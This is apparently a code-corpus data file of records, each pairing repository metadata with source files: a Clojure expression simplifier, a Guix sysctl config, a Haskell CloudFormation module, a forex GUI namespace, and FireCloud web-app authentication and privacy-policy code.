(-> sqrt-contract
(simplify-until-stable simplify-and-flatten))))
(only-if trig?
(comp (-> (comp universal-reductions rules/sincos->trig)
(simplify-and-canonicalize simplify-and-flatten))
(-> rules/complex-trig
(simplify-and-canonicalize simplify-and-flatten))
(-> rules/angular-parity
(simplify-and-canonicalize simplify-and-flatten))
(-> sincos-random
(simplify-until-stable simplify-and-flatten))
(-> rules/sin-sq->cos-sq
(simplify-and-canonicalize simplify-and-flatten))
(-> sincos-flush-ones
(simplify-and-canonicalize simplify-and-flatten))
(only-if rules/*trig-product-to-sum-simplify?*
(-> rules/trig:product->sum
(simplify-and-canonicalize simplify-and-flatten)))
(-> universal-reductions
(simplify-and-canonicalize simplify-and-flatten))
(-> sincos-random
(simplify-until-stable simplify-and-flatten))
(-> rules/sin-sq->cos-sq
(simplify-and-canonicalize simplify-and-flatten))
(-> sincos-flush-ones
(simplify-and-canonicalize simplify-and-flatten))))
(only-if logexp?
(comp (-> universal-reductions
(simplify-and-canonicalize simplify-and-flatten))
(-> (comp rules/log-expand
rules/exp-expand)
(simplify-until-stable simplify-and-flatten))
(-> (comp log-contract
rules/exp-contract)
(simplify-until-stable simplify-and-flatten))))
(-> (comp universal-reductions
(only-if logexp?
(comp rules/log-expand
rules/exp-expand))
(only-if sqrt?
sqrt-expand))
(simplify-until-stable simplify-and-flatten))
(only-if trig?
(-> rules/angular-parity
(simplify-and-canonicalize simplify-and-flatten)))
(-> rules/trig->sincos
(simplify-and-canonicalize simplify-and-flatten))
TODO this should happen at the END , only a single time , after
(only-if partials?
(-> rules/canonicalize-partials
(simplify-and-canonicalize simplify-and-flatten)))
simplify-and-flatten)]
(simple expr))))
|
6f0d0ec3c5b0ce9405eff317a32f3d644f5aef4a5de63b4127ef6ed416767d95 | clojure-quant/infra-guix | sysctl.scm |
; -to-set-sysctl-fs-notify-max-user-watches-in-guix-guix-system-error-servi/1639697#1639697
; -Services.html#Miscellaneous-Services
The service type for sysctl , which modifies kernel parameters under /proc / sys/
(modify-services %desktop-services
(sysctl-service-type config =>
(sysctl-configuration
(settings (append '(("fs.file-max" . "500000")
("fs.inotify.max_user_watches" . "524288"))
%default-sysctl-settings)))))
)
(service sysctl-service-type
(sysctl-configuration
(settings '(("fs.inotify.max_user_watches" . "100000")
("net.core.default_qdisc" . "fq")
("net.ipv4.tcp_congestion_control" . "bbr")))))))
| null | https://raw.githubusercontent.com/clojure-quant/infra-guix/586142652a67909d3bcfa84f17bfe4cd0d7c7b72/modules/awb99/config/sysctl.scm | scheme | -to-set-sysctl-fs-notify-max-user-watches-in-guix-guix-system-error-servi/1639697#1639697
-Services.html#Miscellaneous-Services |
The service type for sysctl , which modifies kernel parameters under /proc / sys/
(modify-services %desktop-services
(sysctl-service-type config =>
(sysctl-configuration
(settings (append '(("fs.file-max" . "500000")
("fs.inotify.max_user_watches" . "524288"))
%default-sysctl-settings)))))
)
(service sysctl-service-type
(sysctl-configuration
(settings '(("fs.inotify.max_user_watches" . "100000")
("net.core.default_qdisc" . "fq")
("net.ipv4.tcp_congestion_control" . "bbr")))))))
|
db2fba3a007b1a55ddec32d580edb3d4ab985a6bb88641888d3afe5755c7604c | mbj/stratosphere | ResourceProperties.hs | module Stratosphere.ResourceProperties
( ResourceProperties(..)
, ToResourceProperties(..)
, resourcePropertiesJSON
)
where
import Stratosphere.Prelude
import qualified Data.Aeson as JSON
import qualified Data.Aeson.Types as JSON
data ResourceProperties
= ResourceProperties
{ awsType :: Text
, properties :: JSON.Object
, supportsTags :: Bool
}
deriving (Show, Eq)
class ToResourceProperties a where
toResourceProperties :: a -> ResourceProperties
resourcePropertiesJSON :: ResourceProperties -> [JSON.Pair]
resourcePropertiesJSON ResourceProperties{..} =
[ "Type" .= awsType
, "Properties" .= properties
]
| null | https://raw.githubusercontent.com/mbj/stratosphere/c70f301715425247efcda29af4f3fcf7ec04aa2f/src/Stratosphere/ResourceProperties.hs | haskell | module Stratosphere.ResourceProperties
( ResourceProperties(..)
, ToResourceProperties(..)
, resourcePropertiesJSON
)
where
import Stratosphere.Prelude
import qualified Data.Aeson as JSON
import qualified Data.Aeson.Types as JSON
data ResourceProperties
= ResourceProperties
{ awsType :: Text
, properties :: JSON.Object
, supportsTags :: Bool
}
deriving (Show, Eq)
class ToResourceProperties a where
toResourceProperties :: a -> ResourceProperties
resourcePropertiesJSON :: ResourceProperties -> [JSON.Pair]
resourcePropertiesJSON ResourceProperties{..} =
[ "Type" .= awsType
, "Properties" .= properties
]
| |
9169cf1ec2e5007f4a1f24286b88665ea54fcf3ff9c6b102cb1c7f3c7f853623 | Storkle/clj-forex | gui.clj |
(clojure.core/use 'nstools.ns)
(ns+ forex.gui
(:clone clj.core)
(:import (javax.swing JScrollPane JFrame JPanel JTextArea
JLabel JButton SwingUtilities))
(:use forex.util.general forex.util.gui clojure.contrib.miglayout)
(:use forex.util.core
forex.util.emacs
forex.util.log)
(:use forex.module.error
forex.module.ea
forex.module.indicator
forex.module.account forex.module.account.utils
[clj-time.core :exclude [extend start]])
(:require
[forex.module.service :as backend]))
| null | https://raw.githubusercontent.com/Storkle/clj-forex/1800b982037b821732b9df1e2e5ea1eda70f941f/src/forex/gui.clj | clojure |
(clojure.core/use 'nstools.ns)
(ns+ forex.gui
(:clone clj.core)
(:import (javax.swing JScrollPane JFrame JPanel JTextArea
JLabel JButton SwingUtilities))
(:use forex.util.general forex.util.gui clojure.contrib.miglayout)
(:use forex.util.core
forex.util.emacs
forex.util.log)
(:use forex.module.error
forex.module.ea
forex.module.indicator
forex.module.account forex.module.account.utils
[clj-time.core :exclude [extend start]])
(:require
[forex.module.service :as backend]))
| |
1b443a24629ec5f53c02206a4f34f4c0aede7a0ae5feed5ef2a4fe1b34038fff | broadinstitute/firecloud-ui | auth.cljs | (ns broadfcui.auth
(:require
[dmohs.react :as react]
[clojure.string :as string]
[broadfcui.common :refer [login-scopes]]
[broadfcui.common :as common]
[broadfcui.common.icons :as icons]
[broadfcui.common.links :as links]
[broadfcui.common.markdown :as markdown]
[broadfcui.common.style :as style]
[broadfcui.components.buttons :as buttons]
[broadfcui.components.spinner :refer [spinner]]
[broadfcui.config :as config]
[broadfcui.endpoints :as endpoints]
[broadfcui.nav :as nav]
[broadfcui.page.external-importer :as external-importer]
[broadfcui.utils :as utils]
[broadfcui.utils.ajax :as ajax]
[broadfcui.utils.user :as user]
))
(react/defc GoogleAuthLibLoader
{:render
(constantly nil)
:component-did-mount
(fn [{:keys [this]}]
(js/gapi.load "auth2" #(this :-handle-auth2-loaded)))
:-handle-auth2-loaded
(fn [{:keys [props]}]
NB : we do not override the fetch_basic_profile config option on auth2.init .
;; fetch_basic_profile defaults to true, and adds "openid email profile" to the
;; list of requested scopes.
(let [{:keys [on-loaded]} props
scopes (string/join
" "
login-scopes)
init-options (clj->js {:client_id (config/google-client-id) :scope scopes})
auth2 (js/gapi.auth2.init init-options)]
(gapi.signin2.render "sign-in-button" #js{:width 180 :height 40 :longtitle true :theme "dark"})
(user/set-google-auth2-instance! auth2)
(on-loaded auth2)))})
(react/defc- Policy
{:render
(fn [{:keys [props]}]
[:div {:style {:maxWidth 716 :backgroundColor "white"
:margin "2.5rem auto 0"
:fontSize (when (= (:context props) :logged-out) "88%")}}
(when (= (:context props) :policy-page)
(list
[:h4 {} "FireCloud Privacy Policy"]
[:p {}
"The following Privacy Policy discloses our information gathering and dissemination
practices for the Broad Institute FireCloud application accessed via the website "
(links/create-external {:href "/"}
"/")
". By using the FireCloud, you agree to the collection and use of information in
accordance with this policy. This Privacy Policy is effective as of 1-19-2017."]
[:h4 {} "Information Gathering"]
[:p {}
"The Broad Institute FireCloud receives and stores information related to users’ Google
profiles, including names, email addresses, user IDs, and OAuth tokens. This information
is gathered as part of the standard Google sign-in process."]
[:p {}
"We also collect information that your browser sends whenever you visit the FireCloud
website (“Log Data”). This Log Data may include information such as your computer’s
Internet Protocol (“IP”) address, browser type, browser version, which pages of the
FireCloud Portal that you visit, the time and date of your visit, the time spent on
individual pages, and other statistics. This information may include any search terms
that you enter on the FireCloud (e.g., dataset name, method name, tag labels). We do not
link IP addresses to any personally identifying information. User sessions will be
tracked, but users will remain anonymous."]
[:p {}
"In addition, we use web tools such as Google Analytics that collect, monitor, and analyze
the Log Data. User information (i.e., name and email address) is not included in our
Google Analytics tracking, but can be internally linked within the FireCloud development
team."]
[:h4 {} "Use of Information"]
[:p {}
"FireCloud uses the information gathered above to enable integration with Google-based
services that require a Google account, such as Google Cloud Storage Platform. We may
also use this information to provide you with the services on FireCloud, improve
FireCloud, and to communicate with you (e.g., about new feature announcements, unplanned
site maintenance, and general notices). Web server logs are retained on a temporary basis
and then deleted completely from our systems. User information is stored in a
password-protected database, and OAuth tokens are only stored for the length of an active
session, are encrypted at rest, and are deleted upon sign out."]
[:p {}
"At no time do we disclose any user information to third parties."]
[:h4 {} "Publicly Uploaded Information"]
[:p {}
"Some features of FireCloud are public facing (e.g, publishing a workspace in the Data
Library) and allow you to upload information (such as new studies) that you may choose to
make publicly available. If you choose to upload content is public-facing, third parties
may access and use it. We do not sell any information that you provide to FireCloud; it
is yours. However, any information that you make publicly available may be accessed and
used by third parties, such as research organizations or commercial third parties."]
[:h4 {} "Security"]
[:p {}
"This site has security measures in place to prevent the loss, misuse, or alteration of
the information under our control. It is compliant with NIST-800-53 and has been audited
as per FISMA Moderate. The Broad Institute, however, is not liable for the loss, misuse,
or alteration of information on this site by any third party."]
[:h4 {} "Changes"]
[:p {}
"Although most changes are likely to be minor, we may change our Privacy Policy from time
to time. We will notify you of material changes to this Privacy Policy through the
FireCloud website at least 30 days before the change takes effect by posting a notice on
our home page or by sending an email to the email address associated with your user
account. For changes to this Privacy Policy that do not affect your rights, we encourage
you to check this page frequently."]
[:h4 {} "Third Party Sites"]
[:p {}
"Some FireCloud pages may link to third party websites or services that are not maintained
by the Broad Institute. The Broad Institute is not responsible for the privacy practices
or the content of any such third party websites or services."]
[:h4 {} "Contacting the FireCloud team"]
[:p {}
"If you have any questions about this privacy statement, the practices of this site, or
your dealings with this site, you can contact us through our "
(links/create-external {:href (config/forum-url)} "help forum")
"."]
[:hr]))
[:h4 {} "WARNING NOTICE"]
[:p {}
"You are accessing a US Government web site which may contain information that must be
protected under the US Privacy Act or other sensitive information and is intended for
Government authorized use only."]
[:p {}
"Unauthorized attempts to upload information, change information, or use of this web site
may result in disciplinary action, civil, and/or criminal penalties. Unauthorized users
of this website should have no expectation of privacy regarding any communications or
data processed by this website."]
[:p {}
"Anyone accessing this website expressly consents to monitoring of their actions and all
communications or data transiting or stored on related to this website and is advised
that if such monitoring reveals possible evidence of criminal activity, NIH may provide
that evidence to law enforcement officials."]
[:h4 {} "WARNING NOTICE (when accessing TCGA controlled data)"]
[:p {:style {:fontWeight "bold"}}
"You are reminded that when accessing TCGA controlled access information you are bound by the
dbGaP TCGA "
(links/create-external {:href ""}
"DATA USE CERTIFICATION AGREEMENT (DUCA)")
"."]])})
(react/defc- PolicyPage
{:render
(fn []
[:div {:style {:padding "1rem" :margin -20 :marginTop "1rem"
:backgroundColor "white"}}
[Policy {:context :policy-page}]])})
(react/defc LoggedOut
{:render
(fn [{:keys [this props]}]
(let [import-page? (string/starts-with? js/document.location.hash "#import")]
Google 's code complains if the sign - in button goes missing , so we hide this component rather
;; than removing it from the page.
[:div {:style {:display (when (:hidden? props) "none") :marginTop "2rem"}}
[:div {:style {:margin "0 auto" :maxWidth 716}}
[:h1 {:style {:marginBottom "0.3rem" :fontWeight 400}}
(cond
import-page? external-importer/import-title
common/has-return? "Hello"
:else "New User?")]
[:div {:style {:marginBottom "1.5rem"}}
(cond
import-page? external-importer/import-subtitle
common/has-return? "The content you are looking for is currently only accessible through the Terra platform's legacy UI."
:else "FireCloud requires a Google account.")]
[:div {:style {:display "flex"}}
[:div {:style {:paddingRight "2rem" :borderRight style/dark-line}}
(if import-page?
(external-importer/render-import-tutorial)
[:div {:style {:lineHeight "130%"}}
(if common/has-return?
"Technically, this is a separate application. You will be asked to re-register and sign-in, as well as accept the Terms of Service. Please use the same Google identity you use to sign in to the Terra platform and co-branded sites."
"Need to create a FireCloud account? FireCloud uses your Google account. Once you have signed in and completed the user profile registration step, you can start using FireCloud.")
(when common/has-return?
[:div {:style {:marginTop "1.5rem"}} "Please bear with us as we migrate this functionality to our new user interface."])
(links/create-external {:style {:display "block" :marginTop "0.3rem"}
:href ""}
"Learn how to create a Google account with any email address.")])]
[:div {:id "sign-in-button"
:style {:flexShrink 0 :width 180 :paddingLeft "2rem" :alignSelf "center"}
:onClick #(this :-handle-sign-in-click)}
(spinner (:spinner-text props))]]]
[Policy {:context :logged-out}]]))
:component-did-mount
(fn [{:keys [props locals]}]
(swap! locals assoc :refresh-token-saved? true)
(let [{:keys [on-change]} props]
(user/add-user-listener
::logged-out
#(on-change (js-invoke % "isSignedIn") (:refresh-token-saved? @locals)))))
:component-will-unmount
(fn []
(user/remove-user-listener ::logged-out))
:-handle-sign-in-click
(fn [{:keys [props locals]}]
(swap! locals dissoc :refresh-token-saved?)
(let [{:keys [auth2 on-change]} props]
(-> auth2
(.grantOfflineAccess (clj->js {:redirect_uri "postmessage"
:prompt "select_account"}))
(.then (fn [_]
(swap! locals assoc :refresh-token-saved? true)
(let [signed-in? (-> auth2
(aget "currentUser")
(js-invoke "get")
(js-invoke "isSignedIn"))]
(on-change signed-in? true)))))))})
;; Borked servers often return HTML pages instead of JSON, so suppress JSON parsing
;; exceptions because they are useless ("Unexpected token T in JSON...")
(defn- handle-server-error [status-code get-parsed-response]
(let [[_ parsing-error] (get-parsed-response true)]
(if (= 0 status-code)
;; status code 0 typically happens when CORS preflight fails/rejects
{:message "Ajax error."
:statusCode 0}
(if parsing-error
{:message (str "Cannot reach the API server. The API server or one of its subsystems may be down.")
:statusCode status-code}
{:message (get-parsed-response)
:statusCode status-code}))))
(react/defc UserStatus
{:render
(fn [{:keys [state]}]
[:div {:style {:padding "40px 0"}}
(case (:error @state)
nil (spinner "Loading user information...")
:not-active [:div {:style {:color (:state-exception style/colors)}}
"Thank you for registering. Your account is currently inactive."
" You will be contacted via email when your account is activated."]
[:div {}
[:div {:style {:color (:state-exception style/colors) :paddingBottom "1rem"}}
"Error loading user information. Please try again later."]
[:table {:style {:color (:text-lighter style/colors)}}
[:tbody {:style {}}
[:tr {} [:td {:style {:fontStyle "italic" :textAlign "right" :paddingRight "0.3rem"}} "What went wrong:"] [:td {} (:message (:error @state))]]
[:tr {} [:td {:style {:fontStyle "italic" :textAlign "right" :paddingRight "0.3rem"}} "Status code:"] [:td {} (:statusCode (:error @state))]]]]])])
:component-did-mount
(fn [{:keys [props state]}]
(let [{:keys [on-success]} props]
(ajax/call-orch "/me?userDetailsOnly=true"
{:on-done (fn [{:keys [success? status-code get-parsed-response]}]
(if success?
(on-success)
(case status-code
403 can now mean " user has not yet accepted the "
403 (on-success)
404 means " not yet registered "
404 (on-success)
(swap! state assoc :error (handle-server-error status-code get-parsed-response)))))}
:service-prefix "")))})
(react/defc TermsOfService
{:render
(fn [{:keys [state this]}]
(let [{:keys [error tos]} @state
update-status #(this :-get-status)]
[:div {}
(links/create-internal {:style {:position "absolute" :right "1rem" :top "1rem"}
:onClick #(.signOut @user/auth2-atom)}
"Sign Out")
(case error
nil (spinner "Loading Terms of Service information...")
(:declined :not-agreed) [:div {:style {:padding "2rem" :margin "5rem auto" :maxWidth 600
:border style/standard-line}}
[:h2 {:style {:marginTop 0}} "You must accept the Terms of Service to use FireCloud."]
[:div {:style {:display "flex" :flexDirection "column" :alignItems "center"}}
(if tos
[markdown/MarkdownView {:text tos}]
(spinner
[:span {}
"Loading Terms of Service; also available "
[:a {:target "_blank"
:href (str (config/terra-base-url) "/#terms-of-service")}
"here"] "."]))
[:div {:style {:display "flex" :width 200 :justifyContent "space-evenly" :marginTop "1rem"}}
[buttons/Button {:text "Accept" :onClick (:submit-tos @state)}]]]]
[:div {}
[:div {:style {:color (:state-exception style/colors) :paddingBottom "1rem"}}
"Error loading Terms of Service information. Please try again later."]
[:table {:style {:color (:text-lighter style/colors)}}
[:tbody {:style {}}
[:tr {} [:td {:style {:fontStyle "italic" :textAlign "right" :paddingRight "0.3rem"}} "What went wrong:"] [:td {} (:message error)]]
[:tr {} [:td {:style {:fontStyle "italic" :textAlign "right" :paddingRight "0.3rem"}} "Status code:"] [:td {} (:statusCode error)]]]]])]))
:component-did-mount
(fn [{:keys [state this]}]
(this :-get-status))
:-get-tos-text
(fn [{:keys [props state]}]
(let [{:keys [on-success]} props]
(endpoints/tos-get-text
(fn [{:keys [success? status-code raw-response]}]
(swap! state assoc :tos
(if success?
raw-response
(str "Could not load Terms of Service; please read it at "
(str (config/terra-base-url) "/#terms-of-service")
".")))))))
:-get-status
(fn [{:keys [props state this]}]
(let [{:keys [on-success]} props
update-status #(this :-get-status)]
(endpoints/tos-get-status
(fn [{:keys [success? status-code get-parsed-response raw-response]}]
(if (= "true" raw-response)
(on-success)
(do
(this :-get-tos-text)
(swap! state assoc :submit-tos #(endpoints/tos-set-status "app.terra.bio/#terms-of-service" update-status))
(case status-code
;; in this case, the response was false, which is considered a failure case
200 (swap! state assoc :error :not-agreed)
403 means the user declined the TOS ( or has invalid token ? Need to distinguish )
403 (swap! state assoc :error :declined)
(swap! state assoc :error (handle-server-error status-code get-parsed-response)))))))))})
(defn reject-tos [on-done] (endpoints/tos-set-status false on-done))
(defn force-signed-in
  "Returns a sign-in handler used to bypass the interactive Google sign-in
   flow (e.g. in automated tests). Given a raw OAuth access token, it
   validates the token and, on success, installs a stub auth2 instance
   exposing just enough of the gapi surface (getAuthResponse,
   getBasicProfile, hasGrantedScopes, listen, signOut) for the app, then
   calls on-sign-in. On failure it calls on-error with the HTTP status and
   raw response."
  [{:keys [on-sign-in on-sign-out on-error]}]
  (fn [auth-token extra-on-sign-in]
    ;; NOTE(review): the original URL string was corrupted to "=" (likely by
    ;; automated scrubbing). Restored to Google's tokeninfo v3 endpoint,
    ;; which matches the {email, sub} fields parsed from the response below
    ;; -- confirm against the upstream history.
    (ajax/call {:url (str "https://www.googleapis.com/oauth2/v3/tokeninfo?access_token="
                          (js/encodeURIComponent auth-token))
                :on-done
                (fn [{:keys [status-code success? get-parsed-response raw-response]}]
                  ;; use console.warn to make sure logs are captured by selenium
                  (js/console.warn (str "force-signed-in: <" success? "> " raw-response))
                  (if success?
                    (let [{:keys [email sub]} (get-parsed-response)
                          auth2 (clj->js
                                 {:currentUser
                                  {:get
                                   (constantly
                                    (clj->js
                                     {:getAuthResponse
                                      (constantly (clj->js {:access_token auth-token}))
                                      :getBasicProfile
                                      (constantly (clj->js {:getEmail (constantly email)
                                                            :getId (constantly sub)}))
                                      :hasGrantedScopes (constantly true)}))
                                   :listen (constantly nil)}
                                  :signOut on-sign-out})]
                      (user/set-google-auth2-instance! auth2)
                      (on-sign-in)
                      (when (some? extra-on-sign-in)
                        (extra-on-sign-in)))
                    (on-error {:status status-code :response raw-response})))})))
(defn render-forced-sign-in-error
  "Hiccup markup showing the HTTP status and raw response of a failed
   forced sign-in attempt."
  [error]
  (let [{:keys [status response]} error]
    [:div {}
     [:div {} "Status: " status]
     [:div {} "Response: " response]]))
(defn add-nav-paths
  "Register the public :policy navigation path, matched by the URL fragment
   \"policy\" and rendered by PolicyPage."
  []
  (nav/defpath
   :policy
   {:component PolicyPage
    :public? true
    :regex #"policy"
    :make-props (constantly {})
    :make-path (constantly "policy")}))
| null | https://raw.githubusercontent.com/broadinstitute/firecloud-ui/8eb077bc137ead105db5665a8fa47a7523145633/src/cljs/main/broadfcui/auth.cljs | clojure | fetch_basic_profile defaults to true, and adds "openid email profile" to the
list of requested scopes.
it
than removing it from the page.
Borked servers often return HTML pages instead of JSON, so suppress JSON parsing
exceptions because they are useless ("Unexpected token T in JSON...")
status code 0 typically happens when CORS preflight fails/rejects
in this case, the response was false, which is considered a failure case | (ns broadfcui.auth
(:require
[dmohs.react :as react]
[clojure.string :as string]
[broadfcui.common :refer [login-scopes]]
[broadfcui.common :as common]
[broadfcui.common.icons :as icons]
[broadfcui.common.links :as links]
[broadfcui.common.markdown :as markdown]
[broadfcui.common.style :as style]
[broadfcui.components.buttons :as buttons]
[broadfcui.components.spinner :refer [spinner]]
[broadfcui.config :as config]
[broadfcui.endpoints :as endpoints]
[broadfcui.nav :as nav]
[broadfcui.page.external-importer :as external-importer]
[broadfcui.utils :as utils]
[broadfcui.utils.ajax :as ajax]
[broadfcui.utils.user :as user]
))
(react/defc GoogleAuthLibLoader
{:render
(constantly nil)
:component-did-mount
(fn [{:keys [this]}]
(js/gapi.load "auth2" #(this :-handle-auth2-loaded)))
:-handle-auth2-loaded
(fn [{:keys [props]}]
NB : we do not override the fetch_basic_profile config option on auth2.init .
(let [{:keys [on-loaded]} props
scopes (string/join
" "
login-scopes)
init-options (clj->js {:client_id (config/google-client-id) :scope scopes})
auth2 (js/gapi.auth2.init init-options)]
(gapi.signin2.render "sign-in-button" #js{:width 180 :height 40 :longtitle true :theme "dark"})
(user/set-google-auth2-instance! auth2)
(on-loaded auth2)))})
(react/defc- Policy
{:render
(fn [{:keys [props]}]
[:div {:style {:maxWidth 716 :backgroundColor "white"
:margin "2.5rem auto 0"
:fontSize (when (= (:context props) :logged-out) "88%")}}
(when (= (:context props) :policy-page)
(list
[:h4 {} "FireCloud Privacy Policy"]
[:p {}
"The following Privacy Policy discloses our information gathering and dissemination
practices for the Broad Institute FireCloud application accessed via the website "
(links/create-external {:href "/"}
"/")
". By using the FireCloud, you agree to the collection and use of information in
accordance with this policy. This Privacy Policy is effective as of 1-19-2017."]
[:h4 {} "Information Gathering"]
[:p {}
"The Broad Institute FireCloud receives and stores information related to users’ Google
profiles, including names, email addresses, user IDs, and OAuth tokens. This information
is gathered as part of the standard Google sign-in process."]
[:p {}
"We also collect information that your browser sends whenever you visit the FireCloud
website (“Log Data”). This Log Data may include information such as your computer’s
Internet Protocol (“IP”) address, browser type, browser version, which pages of the
FireCloud Portal that you visit, the time and date of your visit, the time spent on
individual pages, and other statistics. This information may include any search terms
that you enter on the FireCloud (e.g., dataset name, method name, tag labels). We do not
link IP addresses to any personally identifying information. User sessions will be
tracked, but users will remain anonymous."]
[:p {}
"In addition, we use web tools such as Google Analytics that collect, monitor, and analyze
the Log Data. User information (i.e., name and email address) is not included in our
Google Analytics tracking, but can be internally linked within the FireCloud development
team."]
[:h4 {} "Use of Information"]
[:p {}
"FireCloud uses the information gathered above to enable integration with Google-based
services that require a Google account, such as Google Cloud Storage Platform. We may
also use this information to provide you with the services on FireCloud, improve
FireCloud, and to communicate with you (e.g., about new feature announcements, unplanned
site maintenance, and general notices). Web server logs are retained on a temporary basis
and then deleted completely from our systems. User information is stored in a
password-protected database, and OAuth tokens are only stored for the length of an active
session, are encrypted at rest, and are deleted upon sign out."]
[:p {}
"At no time do we disclose any user information to third parties."]
[:h4 {} "Publicly Uploaded Information"]
[:p {}
"Some features of FireCloud are public facing (e.g, publishing a workspace in the Data
Library) and allow you to upload information (such as new studies) that you may choose to
make publicly available. If you choose to upload content is public-facing, third parties
is yours. However, any information that you make publicly available may be accessed and
used by third parties, such as research organizations or commercial third parties."]
[:h4 {} "Security"]
[:p {}
"This site has security measures in place to prevent the loss, misuse, or alteration of
the information under our control. It is compliant with NIST-800-53 and has been audited
as per FISMA Moderate. The Broad Institute, however, is not liable for the loss, misuse,
or alteration of information on this site by any third party."]
[:h4 {} "Changes"]
[:p {}
"Although most changes are likely to be minor, we may change our Privacy Policy from time
to time. We will notify you of material changes to this Privacy Policy through the
FireCloud website at least 30 days before the change takes effect by posting a notice on
our home page or by sending an email to the email address associated with your user
account. For changes to this Privacy Policy that do not affect your rights, we encourage
you to check this page frequently."]
[:h4 {} "Third Party Sites"]
[:p {}
"Some FireCloud pages may link to third party websites or services that are not maintained
by the Broad Institute. The Broad Institute is not responsible for the privacy practices
or the content of any such third party websites or services."]
[:h4 {} "Contacting the FireCloud team"]
[:p {}
"If you have any questions about this privacy statement, the practices of this site, or
your dealings with this site, you can contact us through our "
(links/create-external {:href (config/forum-url)} "help forum")
"."]
[:hr]))
[:h4 {} "WARNING NOTICE"]
[:p {}
"You are accessing a US Government web site which may contain information that must be
protected under the US Privacy Act or other sensitive information and is intended for
Government authorized use only."]
[:p {}
"Unauthorized attempts to upload information, change information, or use of this web site
may result in disciplinary action, civil, and/or criminal penalties. Unauthorized users
of this website should have no expectation of privacy regarding any communications or
data processed by this website."]
[:p {}
"Anyone accessing this website expressly consents to monitoring of their actions and all
communications or data transiting or stored on related to this website and is advised
that if such monitoring reveals possible evidence of criminal activity, NIH may provide
that evidence to law enforcement officials."]
[:h4 {} "WARNING NOTICE (when accessing TCGA controlled data)"]
[:p {:style {:fontWeight "bold"}}
"You are reminded that when accessing TCGA controlled access information you are bound by the
dbGaP TCGA "
(links/create-external {:href ""}
"DATA USE CERTIFICATION AGREEMENT (DUCA)")
"."]])})
(react/defc- PolicyPage
{:render
(fn []
[:div {:style {:padding "1rem" :margin -20 :marginTop "1rem"
:backgroundColor "white"}}
[Policy {:context :policy-page}]])})
(react/defc LoggedOut
{:render
(fn [{:keys [this props]}]
(let [import-page? (string/starts-with? js/document.location.hash "#import")]
Google 's code complains if the sign - in button goes missing , so we hide this component rather
[:div {:style {:display (when (:hidden? props) "none") :marginTop "2rem"}}
[:div {:style {:margin "0 auto" :maxWidth 716}}
[:h1 {:style {:marginBottom "0.3rem" :fontWeight 400}}
(cond
import-page? external-importer/import-title
common/has-return? "Hello"
:else "New User?")]
[:div {:style {:marginBottom "1.5rem"}}
(cond
import-page? external-importer/import-subtitle
common/has-return? "The content you are looking for is currently only accessible through the Terra platform's legacy UI."
:else "FireCloud requires a Google account.")]
[:div {:style {:display "flex"}}
[:div {:style {:paddingRight "2rem" :borderRight style/dark-line}}
(if import-page?
(external-importer/render-import-tutorial)
[:div {:style {:lineHeight "130%"}}
(if common/has-return?
"Technically, this is a separate application. You will be asked to re-register and sign-in, as well as accept the Terms of Service. Please use the same Google identity you use to sign in to the Terra platform and co-branded sites."
"Need to create a FireCloud account? FireCloud uses your Google account. Once you have signed in and completed the user profile registration step, you can start using FireCloud.")
(when common/has-return?
[:div {:style {:marginTop "1.5rem"}} "Please bear with us as we migrate this functionality to our new user interface."])
(links/create-external {:style {:display "block" :marginTop "0.3rem"}
:href ""}
"Learn how to create a Google account with any email address.")])]
[:div {:id "sign-in-button"
:style {:flexShrink 0 :width 180 :paddingLeft "2rem" :alignSelf "center"}
:onClick #(this :-handle-sign-in-click)}
(spinner (:spinner-text props))]]]
[Policy {:context :logged-out}]]))
:component-did-mount
(fn [{:keys [props locals]}]
(swap! locals assoc :refresh-token-saved? true)
(let [{:keys [on-change]} props]
(user/add-user-listener
::logged-out
#(on-change (js-invoke % "isSignedIn") (:refresh-token-saved? @locals)))))
:component-will-unmount
(fn []
(user/remove-user-listener ::logged-out))
:-handle-sign-in-click
(fn [{:keys [props locals]}]
(swap! locals dissoc :refresh-token-saved?)
(let [{:keys [auth2 on-change]} props]
(-> auth2
(.grantOfflineAccess (clj->js {:redirect_uri "postmessage"
:prompt "select_account"}))
(.then (fn [_]
(swap! locals assoc :refresh-token-saved? true)
(let [signed-in? (-> auth2
(aget "currentUser")
(js-invoke "get")
(js-invoke "isSignedIn"))]
(on-change signed-in? true)))))))})
(defn- handle-server-error [status-code get-parsed-response]
(let [[_ parsing-error] (get-parsed-response true)]
(if (= 0 status-code)
{:message "Ajax error."
:statusCode 0}
(if parsing-error
{:message (str "Cannot reach the API server. The API server or one of its subsystems may be down.")
:statusCode status-code}
{:message (get-parsed-response)
:statusCode status-code}))))
(react/defc UserStatus
{:render
(fn [{:keys [state]}]
[:div {:style {:padding "40px 0"}}
(case (:error @state)
nil (spinner "Loading user information...")
:not-active [:div {:style {:color (:state-exception style/colors)}}
"Thank you for registering. Your account is currently inactive."
" You will be contacted via email when your account is activated."]
[:div {}
[:div {:style {:color (:state-exception style/colors) :paddingBottom "1rem"}}
"Error loading user information. Please try again later."]
[:table {:style {:color (:text-lighter style/colors)}}
[:tbody {:style {}}
[:tr {} [:td {:style {:fontStyle "italic" :textAlign "right" :paddingRight "0.3rem"}} "What went wrong:"] [:td {} (:message (:error @state))]]
[:tr {} [:td {:style {:fontStyle "italic" :textAlign "right" :paddingRight "0.3rem"}} "Status code:"] [:td {} (:statusCode (:error @state))]]]]])])
:component-did-mount
(fn [{:keys [props state]}]
(let [{:keys [on-success]} props]
(ajax/call-orch "/me?userDetailsOnly=true"
{:on-done (fn [{:keys [success? status-code get-parsed-response]}]
(if success?
(on-success)
(case status-code
403 can now mean " user has not yet accepted the "
403 (on-success)
404 means " not yet registered "
404 (on-success)
(swap! state assoc :error (handle-server-error status-code get-parsed-response)))))}
:service-prefix "")))})
(react/defc TermsOfService
{:render
(fn [{:keys [state this]}]
(let [{:keys [error tos]} @state
update-status #(this :-get-status)]
[:div {}
(links/create-internal {:style {:position "absolute" :right "1rem" :top "1rem"}
:onClick #(.signOut @user/auth2-atom)}
"Sign Out")
(case error
nil (spinner "Loading Terms of Service information...")
(:declined :not-agreed) [:div {:style {:padding "2rem" :margin "5rem auto" :maxWidth 600
:border style/standard-line}}
[:h2 {:style {:marginTop 0}} "You must accept the Terms of Service to use FireCloud."]
[:div {:style {:display "flex" :flexDirection "column" :alignItems "center"}}
(if tos
[markdown/MarkdownView {:text tos}]
(spinner
[:span {}
"Loading Terms of Service; also available "
[:a {:target "_blank"
:href (str (config/terra-base-url) "/#terms-of-service")}
"here"] "."]))
[:div {:style {:display "flex" :width 200 :justifyContent "space-evenly" :marginTop "1rem"}}
